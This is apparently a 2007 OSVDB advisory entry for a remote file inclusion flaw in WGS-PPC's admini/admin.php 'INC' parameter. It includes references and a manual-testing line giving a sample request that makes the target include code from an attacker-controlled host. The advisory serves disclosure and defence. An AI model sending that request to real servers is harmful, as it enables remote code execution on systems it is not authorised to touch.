WGS-PPC (PPC Search Engine) admini/admin.php INC Variable Remote File Inclusion

2007-02-23T01:13:34
ID OSVDB:33448
Type osvdb
Reporter IbnuSina(emel_gw_ini@yahoo.com)
Modified 2007-02-23T01:13:34

Description

Vulnerability Description

WGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

The vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.

Short Description

WGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/path/admini/admin.php?INC=http://[attacker]?

References:

Related OSVDB ID: 33445 Related OSVDB ID: 33452 Related OSVDB ID: 33447 Related OSVDB ID: 33454 Related OSVDB ID: 33444 Related OSVDB ID: 33446 Related OSVDB ID: 33449 Related OSVDB ID: 33451 Related OSVDB ID: 33453 Related OSVDB ID: 33450 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html Mail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html ISS X-Force ID: 31355 Generic Exploit URL: http://milw0rm.com/exploits/3104 CVE-2007-0167 Bugtraq ID: 21961